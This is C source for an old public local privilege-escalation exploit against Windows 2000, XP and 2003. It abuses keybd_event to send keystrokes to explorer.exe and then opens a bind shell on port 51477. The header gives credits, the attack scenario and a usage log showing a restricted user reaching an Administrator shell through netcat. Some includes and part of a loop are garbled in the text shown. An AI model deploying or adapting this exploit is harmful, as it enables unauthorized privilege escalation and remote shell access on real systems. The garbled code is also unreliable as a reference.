/* * Microsoft Windows keybd_event validation vulnerability. * Local privilege elevation * * Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com ) * Iñaki Lopez ( ilo _@_ reversing.org ) * * Platforms afected/tested: * * - Windows 2000 * - Windows XP * - Windows 2003 * * * Original Advisory: http://www.haxorcitos.com * http://www.reversing.org * * Exploit Date: 08 / 06 / 2005 * * Orignal Advisory: * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * * Attack Scenario: * * a) An attacker who gains access to an unprivileged shell/application executed * with the application runas. * b) An attacker who gains acces to a service with flags INTERACT_WITH_DESKTOP * * Impact: * * Due to an invalid keyboard input validation, its possible to send keys to any * application of the Desktop. * By sending some short-cut keys its possible to execute code and elevate privileges * getting loggued user privileges and bypass runas/service security restriction. * * Exploit usage: * * C:\>whoami * AQUARIUS\Administrador * * C:\>runas /user:restricted cmd.exe * Escribir contraseña para restricted: * Intentando iniciar "cmd.exe" como usuario "restricted"... * * * Microsoft Windows 2000 [Versión 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32>cd \ * * C:\>whoami * AQUARIUS\restricted * * C:\>tlist.exe |find "explorer.exe" * 1140 explorer.exe Program Manager * * C:\>keybd.exe 1140 * HANDLE Found. Attacking =) * * C:\>nc localhost 51477 * Microsoft Windows 2000 [Versión 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\>whoami * whoami * AQUARIUS\Administrador * * * DONE =) * */ #include #include #include #pragma comment(lib, "ws2_32.lib") #define SIATIGERTEAM 51477 unsigned int pid = 0; char buf[256]=""; /**************************************************************/ void ExplorerExecution (HWND hwnd, LPARAM lParam){ DWORD hwndid; int i; GetWindowThreadProcessId(hwnd,&hwndid); if (hwndid == pid){ /* Replace keybd_event with SendMessage() and PostMessage() calls */ printf("HANDLE Found. Attacking =)\n"); SetForegroundWindow(hwnd); keybd_event(VK_LWIN,1,0,0); keybd_event(VkKeyScan('r'),1,0,0); keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0); keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0); for(i=0;i= 2) { pid = atoi (argv[1]); strncpy(buf,argv[0],sizeof(buf)-1); EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd)); } else { BindShell(); } } /**************************************************************/